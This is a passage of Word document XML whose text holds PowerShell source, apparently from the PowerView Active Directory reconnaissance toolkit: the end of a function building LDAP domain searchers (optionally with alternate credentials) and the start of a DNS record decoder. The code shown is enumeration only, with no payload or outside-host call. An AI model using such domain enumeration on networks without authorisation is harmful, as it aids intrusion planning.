    <w:p w14:paraId="14C24361" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F9044" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="336E6B1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F9B97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D0ACD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83D521" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9413BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5AC59E03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4BB1F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F6C7D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A5C5F2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BB979E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB43535" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B69FD8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C311F7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSprefix,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339184EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70A570CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E58094" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20827D6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49122892" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58AB3371" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE15E0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E1F70E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CFC839" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B412186" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if(-not $Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB00453" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(-not $Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A29455" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Domain = (Get-NetDomain).name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132152DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00744419" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif(-not $DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076530D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500EDBE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if there's no -DomainController specified, try to pull the primary DC to reflect queries through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65171CAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DomainController = ((Get-NetDomain).PdcRoleOwner).Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B3DC49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0916A248" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C5BC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "Get-DomainSearcher: Error in retrieving PDC for current domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2638CC6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C06B50E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CBCEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C84D52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif (-not $DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374B4DB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if a DC isn't specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF0E99A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E9269" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A839B57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EB203C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58409083" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            throw "Get-DomainSearcher: Error in retrieving PDC for current domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF4CF07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7066D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="617E56FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC2E7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            throw "Get-DomainSearcher: Error in retrieving PDC for current domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F00738" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E519D5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0E4D67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BBC3BBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $SearchString = "LDAP://"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4C9AE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48DF5035" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A14D540" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchString += $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C45C37A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Domain){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69073F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SearchString += '/'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7747D340" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19803683" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B80798" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D08416A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($ADSprefix) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C24844" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchString += $ADSprefix + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B1A7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1419AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="102A1F93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if($ADSpath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A0B71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ADSpath -Match '^GC://') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B65BB01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're searching the global catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3DDBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DN = $AdsPath.ToUpper().Trim('/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1EADB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SearchString = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFA602D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C48885F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A47F2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($ADSpath -match '^LDAP://') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFB2F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($ADSpath -match "LDAP://.+/.+") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970C056" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $SearchString = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F7597" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9EED3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFFE64B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ADSpath = $ADSpath.Substring(7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632C0BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2418BEF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64620ACD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DN = $ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20453FDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF5ED2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D562DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623E0063" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Domain -and ($Domain.Trim() -ne "")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA1C2D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DN = "DC=$($Domain.Replace('.', ',DC='))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBC62A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521BBD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A302E33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2569477A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $SearchString += $DN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7CAFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Write-Verbose "Get-DomainSearcher search string: $SearchString"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21634A8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="792F68EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD908F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Using alternate credentials for LDAP connection"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6338CBE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F372A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A813AD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA43D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C92F66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2C40E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC2F0DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="049EBC9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Searcher.PageSize = $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B63EE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Searcher.CacheResults = $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62971CE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Searcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C7141" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD1B250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16B28FE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B46D5B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Convert-DNSRecord {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47820761" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6261E0AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF4BE16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B2D3426" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       Decodes a binary DNS record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20366DB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="631B21F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">       Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F34545" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69B52C8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DNSRecord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667AF7CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1681B132" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for zones, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08777B59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6AC3B0F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7067DC73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B810BE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B1AA5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE122F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A069F77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B207FB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Byte[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D016AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSRecord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7202AF1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C048ADA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="054FCAB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    function Get-Name {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61201875" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # modified decodeName from https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27571BC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D1112F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        param(</w:t>
